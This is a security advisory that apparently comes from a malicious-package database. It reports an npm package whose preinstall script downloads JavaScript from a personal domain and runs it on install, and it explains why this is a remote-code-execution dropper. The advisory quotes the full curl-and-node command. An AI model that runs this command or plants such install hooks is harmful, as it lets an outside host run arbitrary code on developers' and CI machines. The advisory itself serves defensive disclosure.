MAL-2026-6265
Malicious code in sn-internal-testjgsakjdkjadkjah (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261) package.json declares a preinstall lifecycle script that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On `npm install`, this downloads JavaScript from poc.amanrawat.com over an unpinned, unverified URL, overwrites the package's index.js with the fetched bytes, and immediately executes them with node under the installer's user privileges. The destination is a personal domain unrelated to any legitimate publisher infrastructure, the content is mutable (whatever bytes are served at request time are executed), and there is no hash, signature, or version pin. This is a textbook install-time remote code execution dropper: the attacker controlling poc.amanrawat.com can run arbitrary code on every machine that installs this package, including developer workstations and CI systems. Package metadata (name `sn-internal-testjgsakjdkjadkjah`, description 'This is our internal app for testing', author `amanrawat` matching the fetch domain) suggests a proof-of-concept publication, but the install-time behavior is functionally identical to a malicious dropper regardless of author intent.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for sn-internal-testjgsakjdkjadkjah (npm). Pin to a known-safe version or switch to an alternative.
References
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.6 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.4 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.5 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.3 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.2 [PACKAGE]